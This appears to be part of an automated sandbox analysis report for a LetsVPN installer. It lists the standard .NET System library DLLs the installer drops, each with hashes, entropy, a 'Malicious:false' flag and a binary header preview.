                                                                                                                                                                                                  SSDEEP:384:J4YlS5PWAb6jDW5hqWOHlLf2KQcvBZ9M2S+ShjmM6IGBkSss:JmY+q3b2KZBZLS+ST6nkxs
                                                                                                                                                                                                  MD5:56A6C05FF05053C5215402E40EE616D4
                                                                                                                                                                                                  SHA1:785AF2FD4E16AFF0C51C22A8AE993C6A55AD693D
                                                                                                                                                                                                  SHA-256:D62B71BDFA516FC9E01D872B293F6388F4E6F9D297DBFD68C6B345ED8BC21C52
                                                                                                                                                                                                  SHA-512:D6B49C38D7ACDCEE2FC7C04326C73E6806FE2F87E5E2FC4565EA20F469C95E7F4464058342F1CD09B6FB63BC6BDBD16B11CB6A4CC4346250F675AFAD1BD5811D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.W..........." ..0..............9... ...@....... ....................................`.................................M9..O....@...............&.. ....`......88..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................9......H........!...............5..0....7......................................:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.X509Certificates.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.860394751504702
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ITjbocNsWMhW2hqWOHlLf2KQcvBZ9F7S+ShjmM6IGBkSsrR:cboYyJq3b2KZBZjS+ST6nkhR
                                                                                                                                                                                                  MD5:0E4AFDD81561BB3250CE3A82745D0A06
                                                                                                                                                                                                  SHA1:B2152832A8329C9946FA76AEBBB640C00CC30F65
                                                                                                                                                                                                  SHA-256:0F61A4928C67EA462B906F899CCE93A800274C6293A5806AB423BDC409F827F7
                                                                                                                                                                                                  SHA-512:5091F12DAE47557EEA47956EAFE1246EAF703136D232EC14E20E383E57D261386F6CDCD453E5A4DDAE0F3883B0434141ED0E27AB82047372AD3B1042A87720E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.................. ...@....... ...............................o....@..................................-..O....@.................. ....`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................,......................................BSJB............v4.0.30319......l.......#~......|...#Strings....x.......#US.|.......#GUID.......(...#Blob......................3................................'.....).........u.................=......."...:."...W.".....".....".....".....".....".....[.....".................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;./...C.J...K.j...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Xml.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):52256
                                                                                                                                                                                                  Entropy (8bit):5.867121098890678
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:tszrvuWznnuJlMeEM8Hy8d4Vx50lAhDVC+mq3b2KZBZcaS+ST6nksL:tgrvuqcP8RE5tQ+J3qKH/mqL
                                                                                                                                                                                                  MD5:438EA6C5B869E778CD9B96D37A827BBF
                                                                                                                                                                                                  SHA1:2F12F7ECC47EF9C2BD899811343BD49BE1AC74DA
                                                                                                                                                                                                  SHA-256:1A64B14FB86A517CBB62319543BBB2BE415B5FFF7E52FC356BAEB5E549267F38
                                                                                                                                                                                                  SHA-512:5E0E170DBE2AF3BE6B975EE33D87E8C26097A8C4F722EEAD41EE8F7815D29B17DD845B8BA2AD1FC85D6963D7EFBD950B646770465E5F37F04D90416301207844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ........... ...................................`.....................................O.......4............... ...............T............................................ ............... ..H............text....... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B.......................H........&...K...........q.. ............................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Permissions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30240
                                                                                                                                                                                                  Entropy (8bit):6.439683136275158
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:T47XzsCggQsW7Sl8xjP/QZsq3b2KZBZQS+ST6nkt:k7XgpRxb/kn3qKe/m3
                                                                                                                                                                                                  MD5:4E6698EF08CFF72D265F37D91F40B32F
                                                                                                                                                                                                  SHA1:4C3FD998F328AA109C8F06DA48233A0E97BBF140
                                                                                                                                                                                                  SHA-256:B668AFE067181342CDE9BCE756D559DBB89A77CF57C6D43248209F9D5B9E5123
                                                                                                                                                                                                  SHA-512:CE2BB74A70875A97372859C6D857898217747C180B546439958C0B3DF0C525CE1857D4942590CAEDDA4E06A1C7BD8BD24E17422E07CDF2D87285D878BDE9175E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0............." ..0..>..........r]... ...`....... ..............................U.....`..................................]..O....`...............H.. ...........(\..T............................................ ............... ..H............text...x=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B................S]......H........#...2..........0U..x....[.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.Windows.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.817500254068075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rEwo6eTs14YY4cWpOWqhqWOHlLf2KQcvBZ9tm9dZS+ShjmM6IGBkSlp:AwDdT+q3b2KZBZcS+ST6nkYp
                                                                                                                                                                                                  MD5:593DCCB65E6B3FA04C7BAF70468FB246
                                                                                                                                                                                                  SHA1:604295C9FCE17F74C615F01099F299B893DC578A
                                                                                                                                                                                                  SHA-256:9DB72960541B2D616BE36E4B93A6A1E175C3BA19FF499F4FA52F65BE9B0A118D
                                                                                                                                                                                                  SHA-512:1B3F9D7CF29B55AE376144642DDACEB4F838D74B4FECC1F43B51ED773011020E6FD3CB2DCC4882CFCFD815873EF36DB8C37F2B3EE4BDEF5C04E32C896354520A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r..........." ..0.............V8... ...@....... ....................................`..................................8..O....@...............$.. ....`.......6..T............................................ ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................68......H.......|!..............\4.. ...|6......................................:.(......}....*..{....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*..BSJB............v4.0.30319......l.......#~..@.......#Strings....8.......#US.<.......#GUID...L.......#Blob...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.955751189727143
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qSKiWIhWghqWOHlLf2KQcvBZ9s4WS+ShjmM6IGBkSavP:qSK8Tq3b2KZBZLWS+ST6nkPn
                                                                                                                                                                                                  MD5:12E1F87B4E4AE9C1B2C0B869C1C245D0
                                                                                                                                                                                                  SHA1:0827BCB962BF1A46FB2FCDFF1650E659E8B571F9
                                                                                                                                                                                                  SHA-256:B150643E26EF1B14B56F2937943E7A33386A8EDEA200219350B65C1998624973
                                                                                                                                                                                                  SHA-512:E7C0D6E031B82F6C11A35587AAD76C3C50E0ABAFD55CADF8A17F79C095B59811B1082FFF18D9C9CD67742627F161D4B7D72A64F542D540F244289761F206DDD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ...................................@.................................t(..O....@.. ............... ....`......<'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..l....................&......................................BSJB............v4.0.30319......l.......#~......@...#Strings....D.......#US.H.......#GUID...X.......#Blob......................3......................................................\.....0.....'.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.896920735077221
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:/0KbZWApWmWTpWmyhqWOHlLf2KQcvBZ9Qr3RS+ShjmM6IGBkSAB0i:sKRylGq3b2KZBZyhS+ST6nkR0i
                                                                                                                                                                                                  MD5:AB085119653ACB754C41844348FE3F5F
                                                                                                                                                                                                  SHA1:0118CBCF925712558061C5E9E271C794B5533B6A
                                                                                                                                                                                                  SHA-256:C02843ABE60064456389B7F9727661DCFE02523B5161A4DA8963B400471961C9
                                                                                                                                                                                                  SHA-512:6A615675953BCC9DB39B77EF4D8E44E3E215A4F986678F997AD17615B4D7CFBE1F2167371DE04E77278129D8C25B6C327E9F928B4F1F329A531F4C52750C8D83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............)... ...@....... ..............................v.....@.................................>)..O....@.................. ....`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................r)......H.......p .......................(........................................(....*..(....*..(....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings....`.......#US.h.......#GUID...x...(...#Blob...........G..........3.............................................."...........C...........u...............m.b...........J.....J.....J.....J...6.J...O.J.....J.....J...j.C...S.J.............................P ............X ............` ......4.....h ....................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Duplex.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.972496245661368
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XLH9W5nOWihqWOHlLf2KQcvBZ9c9TyS+ShjmM6IGBkS9f08:XL4Gq3b2KZBZQyS+ST6nk+f08
                                                                                                                                                                                                  MD5:3C3E85085D12983A32AD6C6A2CA91BBA
                                                                                                                                                                                                  SHA1:378F899018CEB4B24F22BCF0E9BD2AE0324C45CD
                                                                                                                                                                                                  SHA-256:03EFEB3214F6D2811BABD2A6DFCF6B512B0CC9D1E11FFB24ABB88E5866DD4F64
                                                                                                                                                                                                  SHA-512:6CE6250595400D5CDAE6ADCE03E43C8ADDF4AE65F33AE7EDB94094301D5498EF0C9453B00850A8D23A8462E199FCFC10A450D2B4A29F4C10BBC311407ECD4158
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y............" ..0..............)... ...@....... ....................................`..................................(..O....@..p............... ....`.......'..T............................................ ............... ..H............text...$.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..D.......#Strings............#US.........#GUID.......$...#Blob......................3................................................*.0.....0...g.....P...........M...........c.......................J.....{.....~.......+...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....+.8...+.N...3.d...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Http.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.876963437900696
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:2lbWvX+W2hqWOHlLf2KQcvBZ9mVS+ShjmM6IGBkSD:22iq3b2KZBZaS+ST6nkM
                                                                                                                                                                                                  MD5:A3C1273F2145FB8D93DECB44CE19B403
                                                                                                                                                                                                  SHA1:E9733AFA79116C1BC21C280FD84A98599D43543F
                                                                                                                                                                                                  SHA-256:45D4AC5C94A5CF78D2E4ED795767550407C4E3ED2C9E481E0DBBA71DAF331D41
                                                                                                                                                                                                  SHA-512:259BC3A26D1E20EE16D10E3BAF563B4DC0C24F4525AB786C70FB3DC9EFC7042F9177A24836DDE2A3D5E45715CD2FA7FAC8B97DAA49DE5C33C6E72908C4F19B50
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............,... ...@....... ...............................p....`.................................L,..O....@..`............... ....`......\+..T............................................ ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...8...#~..........#Strings....T.......#US.X.......#GUID...h...$...#Blob......................3................................................}.t.....t.....a........._.......................B.................................................[.....[.....[...).[...1.[...9.[...A.[...I.[...Q.[...Y.[...a.[...i.[...q.[.......................#.....+.....+.6...+.L...3.b...;.}...C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.NetTcp.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.89250295264903
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:c2mtX7WWRvWWchqWOHlLf2KQcvBZ9bYD5RkS+ShjmM6IGBkS+fk:c28XdMq3b2KZBZVkkS+ST6nkpfk
                                                                                                                                                                                                  MD5:972D2CD78F6CF7267CB7BB5FB90CEF7E
                                                                                                                                                                                                  SHA1:16FA79E77AD04062E741887F2C20886E08498D51
                                                                                                                                                                                                  SHA-256:81C839BB8194AF5342D84F0CDF0CD30A37AE391B2B0F871C206BD20CA22FDDDA
                                                                                                                                                                                                  SHA-512:C85D368805D0D2C7409A249D4F7253A7CB75C05F2AF8C49479F375C2AEA4F38EDC0FFE0D4D2E9B21AAEAA94A7D4ED8A42C0A121B7BCF74DC3F26CE70879E7ED6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>c..........." ..0............."*... ...@....... ..............................K.....`..................................)..O....@..p............... ....`.......(..T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................\(......................................BSJB............v4.0.30319......l... ...#~......H...#Strings............#US.........#GUID.......$...#Blob......................3..................................................4...q.4...E.!...T...........+.....X.....'...........p.................Y.....B...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....+.8...+.N...3.d...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24096
                                                                                                                                                                                                  Entropy (8bit):6.538265849347418
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:p8h2IgODoeNlPSCqWvVEWJlhqWOHlLf2KQcvBZ9S1GS+ShjmM6IGBkSLE:6z1zNlFBvLq3b2KZBZwGS+ST6nkv
                                                                                                                                                                                                  MD5:9C025374184B9455320FA76092C9E5AF
                                                                                                                                                                                                  SHA1:3DA46D5C933E60CFD117B7EA37014D6D79A0C227
                                                                                                                                                                                                  SHA-256:35457DFAD21D597170CDD44BA7B80618CDF15E3D8F30DD417D6AA8A8A06B15C6
                                                                                                                                                                                                  SHA-512:12D92DB376BB8F1F50034855C51D0D9DF8B4483F3F2CD80CF6B18373A53269C020AA36D897AE4FC30563B0299018DB0E1BFAAB16AAA48409C0536B23D5002417
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........D... ...`....... ..............................`b....`.................................xD..O....`...............0.. ...........|C..T............................................ ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc..............................@..B.................D......H.......P ..."...................B......................................BSJB............v4.0.30319......l.......#~..,...D...#Strings....p ......#US.t ......#GUID.... ..(...#Blob......................3......................................I...............\...................t.....t...C.t.....t...\.t.....t...6.t.....t.....t.....l.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+. ...+.<...+.R...3.h...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.920981860705336
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CLkW1JgWBhqWOHlLf2KQcvBZ9jDU4S+ShjmM6IGBkSlxxl:CVJq3b2KZBZK4S+ST6nkAxl
                                                                                                                                                                                                  MD5:F80FEE9B7D237CC74781BE1FA407C84F
                                                                                                                                                                                                  SHA1:F25C6840EF0A9474A049A4720F18B3F3D35825F4
                                                                                                                                                                                                  SHA-256:945C8142C6DCE8DF9B3CA23EA98D46045051C4FA513329EED22C4B3806A4B4EC
                                                                                                                                                                                                  SHA-512:3ED8D958C78B6452BE1E104E4655B9B8CBF43C6B8DD2E08CD1C75FE4FDCAA950521E9538EFC7316A022AF223B00AD88F4134DEA6B4D22E051D8BFF87C636655C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1..........." ..0.............V-... ...@....... ..............................^.....`..................................-..O....@.................. ....`.......,..T............................................ ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8-......H.......P ..<....................+......................................BSJB............v4.0.30319......l...<...#~......X...#Strings............#US.........#GUID.......(...#Blob......................3................................................:.............................w...........s.......................Z.............%.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....+.:...+.P...3.f...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Syndication.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20000
                                                                                                                                                                                                  Entropy (8bit):6.829709317092374
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iISW5NW2eWhhqWOHlLf2KQcvBZ9qfAzhaS+ShjmM6IGBkS5M:i+5bPq3b2KZBZB8S+ST6nkF
                                                                                                                                                                                                  MD5:A3AFDF77AF6A68CDEF15B468470622A3
                                                                                                                                                                                                  SHA1:C7F9B758569CF66D77A201B3E9D8F1FDE7640103
                                                                                                                                                                                                  SHA-256:72DAC6728F516A6B909A6CEBE7838D6493F63A3FCDADE001AC32A77D32876C1B
                                                                                                                                                                                                  SHA-512:D453817F6198A302FECD8736CE4C1B3D9CF59BDCE484FDFE91860D8BEB8A8EAA50FF401BCB9D5F7F2EB9E06ED521AD4C22CD7E102C0D2EBB90BD6DCCCAB36467
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............4... ...@....... ..............................<O....`................................./4..O....@............... .. ....`......83..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................c4......H........ ...............0.. ....2......................................:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*BSJB............v4.0.30319......l.......#~..........#Strings....\.......#US.`.......#GUID...p.......#Blob...........W..........3........................................................".........................q.......................B...................q...........q...X.q...'.q.....q...K.q...h.q.....q.....q...............%.....y.......{.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceProcess.ServiceController.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22048
                                                                                                                                                                                                  Entropy (8bit):6.804006840038962
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ChO4YkTdk8VKWCWV1upaW4hqWOHlLf2KQcvBZ9eMKQAS+ShjmM6IGBkSe:ChOSQ6q3b2KZBZuQAS+ST6nkR
                                                                                                                                                                                                  MD5:76DAF9C183DCC2B6BC7D4376DE0F21D6
                                                                                                                                                                                                  SHA1:0BEE15FE2B57C824A9A4AD663650A15E74CEA05C
                                                                                                                                                                                                  SHA-256:AE21471D5490904DD73A086B6E59A489230756F9560E07871721B6E5AC7D0F53
                                                                                                                                                                                                  SHA-512:800371B0724081D406A560F44E02D9636E5FF0DA9C32061C388545E2CB92B68576E912C6D90F4176286559F1B8EE11167B270166682BA229843D5356C7DAE80D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............" ..0.............*;... ...@....... .............................../....`..................................:..O....@...............(.. ....`.......9..T............................................ ............... ..H............text...0.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................;......H........!...............7..0...H9......................................:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*BSJB............v4.0.30319......l...4...#~......T...#Strings............#US.........#GUID...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.CodePages.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):764448
                                                                                                                                                                                                  Entropy (8bit):7.47717615350681
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:SILs7xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPq7:jG9km6k/IwRYbiBeKGCz7
                                                                                                                                                                                                  MD5:8A309D9D04F95D704D1B3B9DE0CB3F40
                                                                                                                                                                                                  SHA1:239B41D00B0E3F694D5E8D44594A69ADD9E40AD6
                                                                                                                                                                                                  SHA-256:4CCB06D83139AFECF2676E354404BCB5B08E813678E88AFBBC416F897A83C4BC
                                                                                                                                                                                                  SHA-512:2C240259B33BD1E38F696F13E6B57C87F9656AF70973C83EF2A3153B3D05033212CF8F87CAF23DCDB71ADE5F4775900EEB27A2606D879CA1E1B79CDDCF2F05A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....mo..........." ..0..p..........n^... ........... ....................................`..................................^..O....................|.. ............]..T............................................ ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............z..............@..B................M^......H.......H....$..........<...`....\........................................(....*^.(.......5...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*..............!....0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....( ...*..(!...*.*.(....,.r...p......%...%...(....*...("...*.(...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.977283829370365
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6b1nWCXWThqWOHlLf2KQcvBZ9cWS+ShjmM6IGBkSNzw:E70q3b2KZBZrS+ST6nkN
                                                                                                                                                                                                  MD5:23EBB78F471F77A02CA547D47DAC28E9
                                                                                                                                                                                                  SHA1:46077E24AEF1939A27130CD83B645799685165D2
                                                                                                                                                                                                  SHA-256:647675A1BBB73058745FD67A25DF60FF300FD47421A4806D12A8C1DB5C7521BD
